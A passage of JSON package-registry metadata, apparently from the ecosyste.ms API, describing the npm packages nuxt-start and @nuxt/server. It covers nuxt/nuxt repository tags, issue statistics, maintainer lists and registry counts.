ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T15:44:30.128Z","dependent_packages_count":23,"downloads":12828,"downloads_period":"last-month","dependent_repos_count":335,"rankings":{"downloads":1.0697865132286513,"dependent_repos_count":0.8763779887057935,"dependent_packages_count":1.0547403372424038,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.503944620706962,"average":0.6965672763741417},"purl":"pkg:npm/nuxt-start","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt-start","docker_dependents_count":9,"docker_downloads_count":558695,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt-start","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt-start/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T04:26:11.019Z","issues_count":5861,"pull_requests_count":3395,"avg_time_to_close_issue":9340627.793787336,"avg_time_to_close_pull_request":863155.8930551027,"issues_closed_count":4164,"pull_requests_closed_count":3065,"pull_request_authors_count":451,"issue_authors_count":2654,"avg_comments_per_issue":5.084627196724108,"avg_comments_per_pull_request":2.100441826215022,"merged_pull_requests_count":2745,"bot_issues_count":1,"bot_pull_requests_count":1251,"past_year_issues_count":2729,"past_year_pull_requests_count":2319,"past_year_avg_time_to_close_issue":1473181.8854881267,"past_year_avg_time_to_close_pull_request":282402.1880301602,"past_year_issues_closed_count":1885,"past_year_pull_requests_closed_count":2120,"past_year_pull_request_authors_count":309,"past_year_issue_authors_count":1438,"past_year_avg_comments_per_issue":3.419567607182118,"past_year_avg_comments_per_pull_request":2.0685640362225097,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":943,"past_year_merged_pull_requests_count":1932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":154,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:36:04.713Z","updated_at":"2022-11-20T01:36:04.713Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:36:04.702Z","updated_at":"2022-11-20T01:36:04.702Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2023-02-13T12:58:20.116Z","updated_at":"2023-02-13T12:58:20.116Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2022-11-20T01:36:04.715Z","updated_at":"2022-11-20T01:36:04.715Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096118,"name":"@nuxt/server","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:16:52.292Z","latest_release_published_at":"2024-06-28T11:34:33.719Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-10T12:48:57.180Z","created_at":"2022-04-08T10:39:29.907Z","updated_at":"2026-05-10T12:48:57.180Z","registry_url":"https://www.npmjs.com/package/@nuxt/server","install_command":"npm install @nuxt/server","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2F